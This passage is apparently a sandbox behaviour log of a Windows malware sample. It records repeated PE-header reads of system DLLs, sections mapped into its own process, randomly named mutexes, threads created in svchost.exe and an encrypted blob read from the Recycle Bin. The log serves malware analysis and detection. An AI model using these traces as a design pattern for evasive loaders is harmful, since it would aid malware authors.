C:\WINDOWS\system32\ws2_32.dll none 224 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\ws2_32.dll none 160 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\advapi32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\advapi32.dll none 20 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\advapi32.dll none 224 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\advapi32.dll none 160 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\crypt32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\crypt32.dll none 20 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\crypt32.dll none 224 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\crypt32.dll none 160 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 1 BAD67A2
Section Activities:
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\MSIMG32.dll write and read and execute unknown E30000 77824 own pid readonly object name not found 1 BAE50FD
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\system32\ntdll.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
\KnownDlls\nspr4.dll write and read and execute unknown 1A90000 65536 own pid readonly object name not found 1 BAF1523
C:\WINDOWS\system32\user32.dll query and read commit 1A90000 57344 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ws2_32.dll query and read commit 1A90000 20480 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\advapi32.dll query and read commit 1A90000 28672 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\crypt32.dll query and read commit 1A90000 65536 own pid readonly success or wait 1 BAD6A8A
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 1 1A806B4
\BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 1 BAE0EF7
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
2616 1052 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 1A80639
3420 1052 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
3424 1052 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
3456 1052 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
2204 1052 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
772 1052 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
2812 1052 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
2800 1052 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
4048 1052 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
+ Thread delayed
TID Delay Completion Count Source Address
13344 0s success or wait 925 BAED21A
+ Thread terminated
TID PID Completion Count Source Address
2616 1052 success or wait 0 1A80279
System Activities:
+ System information queried
System info class Completion Count Source Address
BasicInformation success or wait 40 BAD6959
ProcessorInformation success or wait 40 BAD6959
+ Chronological sections
Operation Data Completion Time
Mutant created Name: \BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 2033560455
Thread created PID: 1052 TID: 2616 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2033571481
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: E30000 Size: 77824 Protection: readonly Mapped to pid: own pid object name not found 2033577878
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2033607461
Thread created PID: 1052 TID: 3420 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2035754165
Thread delayed Time: 0 TID: 13344 success or wait 2035757825
System info queried Type: BasicInformation success or wait 2035758164
System info queried Type: ProcessorInformation success or wait 2035758701
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2035759813
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2035780096
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2035798062
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2035798982
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2035816468
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2035817968
System info queried Type: BasicInformation success or wait 2035819657
System info queried Type: ProcessorInformation success or wait 2035820060
Thread created PID: 1052 TID: 3424 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2035823632
Thread created PID: 1052 TID: 3456 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2035873879
Thread delayed Time: 0 TID: 13344 success or wait 2035874748
Thread delayed Time: 0 TID: 13344 success or wait 2035874881
System info queried Type: BasicInformation success or wait 2035875044
System info queried Type: ProcessorInformation success or wait 2035875149
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2035875342
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2035876461
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2035876692
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2035876801
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2035880311
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2035880616
System info queried Type: BasicInformation success or wait 2035880909
System info queried Type: ProcessorInformation success or wait 2035881026
System info queried Type: BasicInformation success or wait 2036753988
System info queried Type: ProcessorInformation success or wait 2036754218
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2036784844
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2036816627
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2036817860
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2036818089
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2036818836
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2036820043
System info queried Type: BasicInformation success or wait 2036820677
System info queried Type: ProcessorInformation success or wait 2036821075
System info queried Type: BasicInformation success or wait 2036848861
System info queried Type: ProcessorInformation success or wait 2036849780
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2036850400
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2036874283
Thread delayed Time: 0 TID: 13344 success or wait 2036874595
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2036876283
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2036877356
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2036878201
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2036879051
System info queried Type: BasicInformation success or wait 2037987554
Thread delayed Time: 0 TID: 13344 success or wait 2037988057
System info queried Type: ProcessorInformation success or wait 2038029695
Thread delayed Time: 0 TID: 13344 success or wait 2038031244
Thread delayed Time: 0 TID: 13344 success or wait 2038031959
System info queried Type: BasicInformation success or wait 2038039189
System info queried Type: ProcessorInformation success or wait 2038039879
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2038041078
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2038044535
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2038046402
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2038046990
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2038050637
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2038052765
System info queried Type: BasicInformation success or wait 2038072550
System info queried Type: ProcessorInformation success or wait 2038073507
Section loaded Path: \KnownDlls\nspr4.dll Access: write and read and execute Type: unknown Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid object name not found 2038120442
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2038123298
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2038126818
Thread delayed Time: 0 TID: 13344 success or wait 2041020788
Thread delayed Time: 0 TID: 13344 success or wait 2041022327
Thread delayed Time: 0 TID: 13344 success or wait 2041024152
System info queried Type: BasicInformation success or wait 2041076893
System info queried Type: ProcessorInformation success or wait 2041077536
File opened Path: C:\WINDOWS\system32\USER32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2041078309
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 4 Value: D8 00 00 00 success or wait 2041081615
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 20 Value: 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2041083667
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 2041084451
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 2041087510
Section loaded Path: C:\WINDOWS\system32\user32.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 57344 Protection: readonly Mapped to pid: own pid success or wait 2041088986
System info queried Type: BasicInformation success or wait 2041109446
System info queried Type: ProcessorInformation success or wait 2041110194
System info queried Type: BasicInformation success or wait 2041128277
System info queried Type: ProcessorInformation success or wait 2041128824
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2041131997
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2042279239
Thread delayed Time: 0 TID: 13344 success or wait 2042279745
Thread delayed Time: 0 TID: 13344 success or wait 2042280716
Thread delayed Time: 0 TID: 13344 success or wait 2042303007
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2042304255
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2042304662
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2042305647
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2042307248
System info queried Type: BasicInformation success or wait 2042307796
System info queried Type: ProcessorInformation success or wait 2042308203
System info queried Type: BasicInformation success or wait 2042315567
System info queried Type: ProcessorInformation success or wait 2042315670
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2042315840
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2042316717
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2042317584
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2042342590
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2042343418
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2042366333
System info queried Type: BasicInformation success or wait 2042367741
System info queried Type: ProcessorInformation success or wait 2042368154
System info queried Type: BasicInformation success or wait 2042977313
System info queried Type: ProcessorInformation success or wait 2042977587
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2042977854
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2042979002
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2042980185
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2042980438
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2042981461
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2042982022
System info queried Type: BasicInformation success or wait 2042983247
System info queried Type: ProcessorInformation success or wait 2042983511
System info queried Type: BasicInformation success or wait 2043010182
System info queried Type: ProcessorInformation success or wait 2043010443
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2043032678
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2043033397
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2043034604
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2043034961
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2046819552
Thread delayed Time: 0 TID: 13344 success or wait 2046819806
Thread delayed Time: 0 TID: 13344 success or wait 2046820793
Thread delayed Time: 0 TID: 13344 success or wait 2046821493
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2046822415
System info queried Type: BasicInformation success or wait 2046845198
System info queried Type: ProcessorInformation success or wait 2046845786
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2046848057
